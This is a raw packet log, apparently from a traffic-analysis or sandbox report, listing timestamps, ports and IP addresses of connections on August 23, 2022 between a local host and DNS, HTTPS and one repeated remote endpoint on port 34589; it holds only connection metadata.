Aug 23, 2022 18:26:30.743377924 CEST	50014	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:26:30.743505955 CEST	50013	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:26:30.743695021 CEST	443	50014	8.8.8.8	192.168.2.3
Aug 23, 2022 18:26:30.743746996 CEST	443	50013	8.8.8.8	192.168.2.3
Aug 23, 2022 18:26:30.744127989 CEST	50014	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:26:30.744174004 CEST	443	50014	8.8.8.8	192.168.2.3
Aug 23, 2022 18:26:30.744187117 CEST	50013	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:26:30.744221926 CEST	443	50013	8.8.8.8	192.168.2.3
Aug 23, 2022 18:26:30.762099981 CEST	443	50013	8.8.8.8	192.168.2.3
Aug 23, 2022 18:26:30.762243986 CEST	50013	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:26:30.800797939 CEST	50013	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:26:30.800836086 CEST	443	50013	8.8.8.8	192.168.2.3
Aug 23, 2022 18:26:30.875938892 CEST	50014	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:26:31.773366928 CEST	443	50014	8.8.8.8	192.168.2.3
Aug 23, 2022 18:26:31.773463011 CEST	443	50014	8.8.8.8	192.168.2.3
Aug 23, 2022 18:26:31.773576975 CEST	50014	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:26:31.796056986 CEST	50014	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:26:31.796104908 CEST	443	50014	8.8.8.8	192.168.2.3
Aug 23, 2022 18:26:41.399689913 CEST	49952	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 18:26:41.722067118 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:41.724257946 CEST	49952	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 18:26:42.040668964 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:42.045286894 CEST	49952	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 18:26:42.362628937 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:42.367829084 CEST	49952	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 18:26:42.687992096 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:42.690226078 CEST	49952	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 18:26:43.008533001 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:43.053982973 CEST	49952	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 18:26:43.369157076 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:43.373706102 CEST	49952	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 18:26:43.693130016 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:43.785203934 CEST	49952	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 18:26:44.102242947 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:44.113759041 CEST	49952	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 18:26:44.311062098 CEST	49872	443	192.168.2.3	216.58.209.35
Aug 23, 2022 18:26:44.311095953 CEST	443	49872	216.58.209.35	192.168.2.3
Aug 23, 2022 18:26:44.428544998 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:44.429527044 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:44.497948885 CEST	49952	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 18:26:44.536427021 CEST	49952	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 18:26:44.851509094 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:44.851547003 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:44.851562023 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:44.851577044 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:44.851592064 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:44.851608992 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:44.851672888 CEST	49952	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 18:26:44.851758003 CEST	49952	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 18:26:44.900461912 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:44.900624990 CEST	49952	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 18:26:45.167114019 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:45.167162895 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:45.167180061 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:45.167196035 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:45.167288065 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:45.167304993 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:45.167320967 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:45.167505980 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:45.167526007 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:45.167551994 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:45.167570114 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:45.167721033 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:45.215060949 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:45.215631008 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:45.226659060 CEST	49952	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 18:26:45.544059992 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:45.544091940 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:45.544106960 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:45.549808025 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:45.597548008 CEST	49952	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 18:26:45.801413059 CEST	49952	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 18:26:46.116022110 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:46.117007017 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:46.120162964 CEST	49952	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 18:26:46.438515902 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:46.442199945 CEST	49952	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 18:26:46.758179903 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:46.776813984 CEST	49952	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 18:26:47.095832109 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:47.097686052 CEST	49952	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 18:26:47.414084911 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:47.497895956 CEST	49952	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 18:26:47.511763096 CEST	49952	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 18:26:47.827434063 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:47.897383928 CEST	49952	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 18:26:47.930567026 CEST	49952	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 18:26:48.245400906 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:48.246011019 CEST	49952	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 18:26:48.561655045 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:48.697335958 CEST	49952	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 18:26:48.710289955 CEST	49952	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 18:26:49.026184082 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:49.036241055 CEST	49952	34589	192.168.2.3	103.89.90.61

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 23, 2022 18:23:33.141156912 CEST	57134	53	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.151293039 CEST	62050	53	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.158418894 CEST	53	57134	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.168169022 CEST	53	62050	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.179774046 CEST	56042	53	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.206335068 CEST	55638	53	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.206666946 CEST	53	56042	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.209953070 CEST	57704	53	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.211716890 CEST	65320	53	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.225227118 CEST	53	55638	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.226371050 CEST	53	57704	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.239218950 CEST	53	65320	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.350414991 CEST	65107	53	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.369291067 CEST	53	65107	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.414158106 CEST	53848	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.433453083 CEST	443	53848	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.440962076 CEST	443	53848	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.441010952 CEST	443	53848	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.517452002 CEST	53848	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.517887115 CEST	53848	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.518126965 CEST	53848	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.536057949 CEST	443	53848	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.536082983 CEST	443	53848	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.536508083 CEST	443	53848	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.536520958 CEST	443	53848	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.683594942 CEST	53848	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.683749914 CEST	53848	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.683829069 CEST	53848	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.982389927 CEST	53848	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.982698917 CEST	53848	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.985843897 CEST	53848	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.986294031 CEST	53848	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:34.001046896 CEST	443	53848	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:34.001079082 CEST	443	53848	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:34.001465082 CEST	53848	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:34.001530886 CEST	53848	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:34.003036976 CEST	443	53848	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:34.025571108 CEST	443	53848	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:34.027380943 CEST	443	53848	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:34.077334881 CEST	53848	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:34.108795881 CEST	53848	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:34.119731903 CEST	443	53848	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:34.492681026 CEST	53848	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:34.509870052 CEST	443	53848	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:34.510915041 CEST	443	53848	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:34.510961056 CEST	443	53848	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:34.517937899 CEST	53848	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:34.543732882 CEST	53848	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:34.549045086 CEST	53848	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:34.559997082 CEST	443	53848	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:34.565990925 CEST	443	53848	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:34.567157030 CEST	443	53848	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:34.567183971 CEST	443	53848	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:34.567497015 CEST	53848	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:34.593197107 CEST	53848	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:34.616561890 CEST	443	53848	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:34.778619051 CEST	53848	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:34.801594019 CEST	443	53848	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:34.813268900 CEST	443	53848	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:34.813293934 CEST	443	53848	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:34.813999891 CEST	53848	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:34.841588020 CEST	53848	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:34.858459949 CEST	443	53848	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:36.420052052 CEST	59433	53	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:36.439410925 CEST	53	59433	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:58.993513107 CEST	60088	53	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:59.009830952 CEST	53	60088	8.8.8.8	192.168.2.3
Aug 23, 2022 18:24:28.043217897 CEST	60825	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:24:28.063244104 CEST	443	60825	8.8.8.8	192.168.2.3
Aug 23, 2022 18:24:28.070777893 CEST	443	60825	8.8.8.8	192.168.2.3
Aug 23, 2022 18:24:28.070827961 CEST	443	60825	8.8.8.8	192.168.2.3
Aug 23, 2022 18:24:28.071136951 CEST	60825	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:24:28.090022087 CEST	443	60825	8.8.8.8	192.168.2.3
Aug 23, 2022 18:24:28.090080023 CEST	443	60825	8.8.8.8	192.168.2.3
Aug 23, 2022 18:24:28.128933907 CEST	443	60825	8.8.8.8	192.168.2.3
Aug 23, 2022 18:24:28.207227945 CEST	443	60825	8.8.8.8	192.168.2.3
Aug 23, 2022 18:24:28.352883101 CEST	60825	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:24:28.353085041 CEST	60825	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:24:28.353763103 CEST	60825	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:24:28.353825092 CEST	60825	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:24:28.359951973 CEST	443	60825	8.8.8.8	192.168.2.3
Aug 23, 2022 18:24:28.360241890 CEST	60825	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:24:28.371623993 CEST	443	60825	8.8.8.8	192.168.2.3
Aug 23, 2022 18:24:28.643461943 CEST	60825	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:24:28.643651962 CEST	60825	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:24:28.643851042 CEST	60825	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:24:28.662609100 CEST	443	60825	8.8.8.8	192.168.2.3
Aug 23, 2022 18:24:28.662633896 CEST	443	60825	8.8.8.8	192.168.2.3
Aug 23, 2022 18:24:28.687932968 CEST	443	60825	8.8.8.8	192.168.2.3
Aug 23, 2022 18:24:28.703370094 CEST	60825	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:24:28.703425884 CEST	60825	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:24:29.254020929 CEST	64936	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:24:29.254348993 CEST	64936	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:24:29.254574060 CEST	64936	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:24:29.278856993 CEST	443	64936	8.8.8.8	192.168.2.3
Aug 23, 2022 18:24:29.278914928 CEST	443	64936	8.8.8.8	192.168.2.3
Aug 23, 2022 18:24:29.280050039 CEST	443	64936	8.8.8.8	192.168.2.3
Aug 23, 2022 18:24:29.280535936 CEST	443	64936	8.8.8.8	192.168.2.3
Aug 23, 2022 18:24:29.280586004 CEST	443	64936	8.8.8.8	192.168.2.3
Aug 23, 2022 18:24:29.280848026 CEST	443	64936	8.8.8.8	192.168.2.3
Aug 23, 2022 18:24:29.280886889 CEST	443	64936	8.8.8.8	192.168.2.3
Aug 23, 2022 18:24:29.281259060 CEST	64936	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:24:29.281346083 CEST	64936	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:24:29.281538010 CEST	64936	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:24:29.282902956 CEST	60473	443	192.168.2.3	142.251.209.4
Aug 23, 2022 18:24:29.298367023 CEST	443	64936	8.8.8.8	192.168.2.3
Aug 23, 2022 18:24:29.298418999 CEST	443	64936	8.8.8.8	192.168.2.3
Aug 23, 2022 18:24:29.298440933 CEST	443	64936	8.8.8.8	192.168.2.3
Aug 23, 2022 18:24:29.298706055 CEST	64936	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:24:29.304009914 CEST	443	60473	142.251.209.4	192.168.2.3
Aug 23, 2022 18:24:29.306091070 CEST	60473	443	192.168.2.3	142.251.209.4
Aug 23, 2022 18:24:29.319650888 CEST	443	60473	142.251.209.4	192.168.2.3
Aug 23, 2022 18:24:29.319715977 CEST	443	60473	142.251.209.4	192.168.2.3
Aug 23, 2022 18:24:29.320024014 CEST	60473	443	192.168.2.3	142.251.209.4
Aug 23, 2022 18:24:29.324079037 CEST	64936	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:24:29.326525927 CEST	443	60473	142.251.209.4	192.168.2.3
Aug 23, 2022 18:24:29.326570988 CEST	443	60473	142.251.209.4	192.168.2.3
Aug 23, 2022 18:24:29.342752934 CEST	60473	443	192.168.2.3	142.251.209.4
Aug 23, 2022 18:24:29.343063116 CEST	60473	443	192.168.2.3	142.251.209.4
Aug 23, 2022 18:24:29.357500076 CEST	60473	443	192.168.2.3	142.251.209.4
Aug 23, 2022 18:24:29.357650995 CEST	60473	443	192.168.2.3	142.251.209.4
Aug 23, 2022 18:24:29.357979059 CEST	60473	443	192.168.2.3	142.251.209.4
Aug 23, 2022 18:24:29.363414049 CEST	443	60473	142.251.209.4	192.168.2.3
Aug 23, 2022 18:24:29.378813028 CEST	443	60473	142.251.209.4	192.168.2.3
Aug 23, 2022 18:24:29.378914118 CEST	443	60473	142.251.209.4	192.168.2.3
Aug 23, 2022 18:24:29.379230022 CEST	60473	443	192.168.2.3	142.251.209.4
Aug 23, 2022 18:24:29.379313946 CEST	60473	443	192.168.2.3	142.251.209.4
Aug 23, 2022 18:24:29.403718948 CEST	443	60473	142.251.209.4	192.168.2.3
Aug 23, 2022 18:24:43.441653967 CEST	64936	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:24:43.458527088 CEST	443	64936	8.8.8.8	192.168.2.3
Aug 23, 2022 18:24:43.468959093 CEST	443	64936	8.8.8.8	192.168.2.3
Aug 23, 2022 18:24:43.469047070 CEST	443	64936	8.8.8.8	192.168.2.3
Aug 23, 2022 18:24:43.510371923 CEST	443	64936	8.8.8.8	192.168.2.3
Aug 23, 2022 18:24:43.520982981 CEST	64936	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:24:43.538431883 CEST	64936	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:24:43.548934937 CEST	443	64936	8.8.8.8	192.168.2.3
Aug 23, 2022 18:24:43.549361944 CEST	64936	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:24:44.034466982 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.055526018 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.071090937 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.071118116 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.114831924 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.134808064 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.134829044 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.262128115 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.319458961 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.319624901 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.319763899 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.321640968 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.321825027 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.322046995 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.322325945 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.322493076 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.339509010 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.341542959 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.341567039 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.341941118 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.342020035 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.342859030 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.343106985 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.343133926 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.343509912 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.379316092 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.379383087 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.379406929 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.379429102 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.379450083 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.379470110 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.379491091 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.379512072 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.379532099 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.379553080 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.379574060 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.381277084 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.382750988 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.384489059 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.386336088 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.387895107 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.390865088 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.390894890 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.392997980 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.394807100 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.396279097 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.397948980 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.399688959 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.402074099 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.402103901 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.405481100 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.405509949 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.408329964 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.410120010 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.412167072 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.413330078 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.415186882 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.417238951 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.418498993 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.420145035 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.421900988 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.423835039 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.425308943 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.427084923 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.428868055 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.430458069 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.432096958 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.433710098 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.562685966 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.705687046 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.708419085 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.708679914 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.708730936 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.708820105 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.726319075 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.728876114 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.730861902 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.732790947 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.734108925 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.735733032 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.737988949 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.739917040 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.739958048 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.743160009 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.744616032 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.745943069 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.747885942 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.749536991 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.751080036 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.752839088 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.754496098 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.783045053 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.803631067 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.805351973 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.807019949 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.808990955 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.916532993 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.916708946 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.916824102 CEST	51105	443	192.168.2.3	216.58.209.42
